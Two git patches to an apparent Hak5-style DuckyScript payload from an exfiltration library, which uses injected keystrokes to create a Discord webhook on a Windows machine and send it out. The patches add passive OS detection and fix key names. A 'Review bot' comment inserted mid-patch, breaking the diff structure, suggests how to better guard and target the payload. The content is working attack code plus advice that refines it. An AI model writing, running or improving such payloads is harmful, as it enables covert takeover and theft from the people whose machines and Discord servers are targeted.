From 40da51da72c13347756c238044b7decc41748699 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Fri, 30 Aug 2024 10:33:40 +0200
Subject: [PATCH 1/2] [+] PASSIVE_WINDOWS_DETECT
---
 .../payload.txt | 45 ++++++++++++++++++-
 1 file changed, 43 insertions(+), 2 deletions(-)
diff --git a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
index 8c26e38c7..8ab42f3b7 100644
--- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
+++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
@@ -8,18 +8,59 @@ REM # Target : Windows 10-11 |
 REM # |
 REM ###############################################################
-
 REM Requirements:
 REM - Internet connection
 REM - Discord Installed
-
 REM You must define the Discord server name i.e. Hak5
 DEFINE #SERVER_NAME example
 REM You must define your Discord webhook if you want to use this method for the exfiltration
 DEFINE #DISCORD_WEBHOOK example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
 REM Open Discord app
 GUI
 DELAY 1000
From 7749aa95c1318b13d31c291f94cc0914a399f962 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 2 Sep 2024 09:50:42 +0200
Subject: [PATCH 2/2] DOWNARROW Error
---
 .../payload.txt | 27 ++++++++++---------
 1 file changed, 15 insertions(+), 12 deletions(-)
diff --git a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
index 8ab42f3b7..37abc84a2 100644
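Review bot: The `$_OS` value set by the PASSIVE_WINDOWS_DETECT block added in PATCH 1/2 is never consulted in the visible lines. Straight after `END_EXTENSION` the payload continues with `REM Open Discord app` / `GUI` whatever the detection result was. As shown, the keystroke sequence would still run on a host outside the declared `Target : Windows 10-11` scope, so the extension only acts as a boot delay here. The rest of the payload lies outside this hunk, so a guard may exist further down. If it does not, the body should be wrapped in the extension's own pattern, `IF ($_OS == WINDOWS) THEN` … `END_IF`. A short comment on `DEFINE #MAX_WAIT 150` and `DEFINE #CHECK_INTERVAL 20` giving the worst-case wait they imply would also help, as would one on what the value in `DEFINE #NOT_WINDOWS 7` stands for.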
--- a/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
+++ b/payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt
@@ -1,12 +1,15 @@
-REM ###############################################################
-REM # |
-REM # Title : Create And Exfiltrate A Webhook Of Discord |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###############################################################
+REM_BLOCK
+###############################################################
+# #
+# Title : Create And Exfiltrate A Webhook Of Discord #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+###############################################################
+END_REM
+
 REM Requirements:
 REM - Internet connection
@@ -115,11 +118,11 @@ TAB
 DELAY 500
 TAB
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
-DOWN_ARROW
+DOWNARROW
 DELAY 500
 ENTER
 DELAY 500